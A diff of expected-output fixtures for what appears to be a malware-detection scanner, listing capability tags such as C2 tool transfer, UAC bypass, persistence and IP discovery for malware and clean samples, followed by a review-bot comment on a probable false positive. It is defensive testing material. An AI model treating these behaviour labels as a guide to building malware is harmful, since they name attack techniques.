diff --git a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
index 27cd557ff..c7d13b7c0 100644
--- a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
+++ b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
@@ -1,11 +1,12 @@
 # python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py: critical
 c2/tool_transfer/python: critical
 discover/ip/public: high
+discover/multiple: medium
 discover/network/interface_list: medium
-discover/system/network: high
 discover/system/platform: medium
 discover/user/name_get: high
-evasion/hidden_paths/hidden: high
+evasion/file/prefix: medium
+evasion/file/prefix/tmp: high
 exec/cmd/pipe: medium
 exec/program: medium
 exec/shell/command: medium
diff --git a/tests/python/2023.JokerSpy/shared.dat.simple b/tests/python/2023.JokerSpy/shared.dat.simple
index b6a0be7c5..a9253ba93 100644
--- a/tests/python/2023.JokerSpy/shared.dat.simple
+++ b/tests/python/2023.JokerSpy/shared.dat.simple
@@ -5,11 +5,11 @@ anti-static/obfuscation/python: high
 c2/tool_transfer/python: high
 data/base64/decode: medium
 data/encoding/base64: low
+discover/multiple: high
 discover/network/interface_list: medium
-discover/system/network: high
 discover/system/platform: medium
 discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/program: medium
 exec/remote_commands/code_eval: medium
 exec/tty/getpass: low
diff --git a/tests/python/2024.Custom.RAT/output.py.simple b/tests/python/2024.Custom.RAT/output.py.simple
index cf8b7e468..da913dc29 100644
--- a/tests/python/2024.Custom.RAT/output.py.simple
+++ b/tests/python/2024.Custom.RAT/output.py.simple
@@ -14,8 +14,9 @@ data/encoding/base64: low
 data/encoding/json_decode: low
 discover/ip/geo: high
 discover/ip/public: high
+discover/multiple: high
 discover/network/interface_list: medium
-discover/system/network: high
+discover/process/name: medium
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/USER: low
@@ -52,5 +53,4 @@ os/fd/write: low
 persist/daemon: medium
 privesc/uac_bypass: high
 process/multithreaded: medium
-process/name_get: medium
 process/terminate/taskkill: high
diff --git a/tests/python/clean/hatch/migrate.py.simple b/tests/python/clean/hatch/migrate.py.simple
index 06847576f..d3dd6534c 100644
--- a/tests/python/clean/hatch/migrate.py.simple
+++ b/tests/python/clean/hatch/migrate.py.simple
@@ -2,10 +2,10 @@
 discover/system/environment: medium
 exec/program: medium
 exec/remote_commands/code_eval: medium
+false-positives/py_hatch: low
 fs/directory/list: low
 fs/file/open: low
 fs/symlink_resolve: low
-impact/remote_access/py_setuptools: medium
 net/download: medium
 os/fd/read: low
 os/fd/write: low
diff --git a/tests/python/clean/numba/support.py.simple b/tests/python/clean/numba/support.py.simple
index ee2f6a10e..fd144277a 100644
--- a/tests/python/clean/numba/support.py.simple
+++ b/tests/python/clean/numba/support.py.simple
@@ -2,6 +2,7 @@
 discover/system/platform: medium
 exec/program: medium
 exec/remote_commands/code_eval: medium
+false-positives/setuptools: low
 fs/directory/create: low
 fs/directory/list: low
 fs/file/open: low
@@ -9,7 +10,6 @@ fs/file/read: low
 fs/file/write: low
 fs/tempdir: low
 fs/tempdir/create: low
-impact/remote_access/py_setuptools: low
 net/url/embedded: low
 os/fd/read: low
 os/fd/write: low
diff --git a/tests/python/clean/numpy/misc_util.py.simple b/tests/python/clean/numpy/misc_util.py.simple
index dc993294a..6907bcce7 100644
--- a/tests/python/clean/numpy/misc_util.py.simple
+++ b/tests/python/clean/numpy/misc_util.py.simple
@@ -1,7 +1,7 @@
 # python/clean/numpy/misc_util.py: medium
 anti-static/obfuscation/python: medium
 discover/system/platform: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/install_additional/pip_install: medium
 exec/program: medium
 exec/remote_commands/code_eval: medium
diff --git a/tests/python/clean/setuptools/namespaces.py.simple b/tests/python/clean/setuptools/namespaces.py.simple
index 4f93d1dee..43cd5497f 100644
--- a/tests/python/clean/setuptools/namespaces.py.simple
+++ b/tests/python/clean/setuptools/namespaces.py.simple
@@ -2,5 +2,5 @@
 data/encoding/json_encode: low
 exec/remote_commands/code_eval: medium
 exec/shell/command: medium
+false-positives/setuptools: low
 fs/directory/create: low
-impact/remote_access/py_setuptools: low
diff --git a/tests/windows/2024.GitHub.Clipper/main.exe.simple b/tests/windows/2024.GitHub.Clipper/main.exe.simple
index d45d4ba9a..6c960140c 100644
--- a/tests/windows/2024.GitHub.Clipper/main.exe.simple
+++ b/tests/windows/2024.GitHub.Clipper/main.exe.simple
@@ -35,7 +35,7 @@ discover/ip/geo: high
 discover/ip/public: high
 discover/network/mac_address: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
 exec/conditional/is_admin: medium
 exec/plugin: low
 exec/program: medium
diff --git a/tests/windows/2024.GitHub.Clipper/raw.py.simple b/tests/windows/2024.GitHub.Clipper/raw.py.simple
index 4879f9c77..340a54e9d 100644
--- a/tests/windows/2024.GitHub.Clipper/raw.py.simple
+++ b/tests/windows/2024.GitHub.Clipper/raw.py.simple
@@ -3,6 +3,7 @@ c2/addr/url: high
 c2/tool_transfer/download: high
 c2/tool_transfer/exe_url: high
 c2/tool_transfer/python: high
+evasion/indicator_blocking/hidden_window: high
 exec/program: medium
 fs/file/open: low
 fs/tempdir: low
diff --git a/tests/windows/2024.aspdasdksa2/creal.pyc.simple b/tests/windows/2024.aspdasdksa2/creal.pyc.simple
index 35c4226f7..8e1ee6ea1 100644
--- a/tests/windows/2024.aspdasdksa2/creal.pyc.simple
+++ b/tests/windows/2024.aspdasdksa2/creal.pyc.simple
@@ -16,7 +16,7 @@ data/base64/decode: medium
 data/encoding/base64: low
 discover/ip/geo: high
 discover/ip/public: high
-discover/system/hostname_get: low
+discover/system/hostname: low
 exec/install_additional/pip_install: high
 exec/program: medium
 exec/tty/getpass: low
diff --git a/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple b/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
index d7c191594..878585519 100644
--- a/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
+++ b/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
@@ -10,6 +10,7 @@ data/encoding/json_decode: low
 data/encoding/json_encode: low
 discover/network/interface_list: medium
 discover/network/netstat: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
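Review bot: A sample under `tests/windows/clean/` now carries a new expected hit, `+discover/system/dmesg: low`, and a Windows .NET assembly reading the Linux kernel ring buffer is implausible, so this looks like the new dmesg rule matching an incidental string rather than real behaviour. Accepting the regenerated fixture would bake that false positive into the baseline for a clean file; the rule that produces it is not in this hunk, but it would be worth tightening it (for example, anchoring the `dmesg` string as a full word or pairing it with a second indicator) before the expectation is committed, or at least recording why the match is acceptable in the commit description.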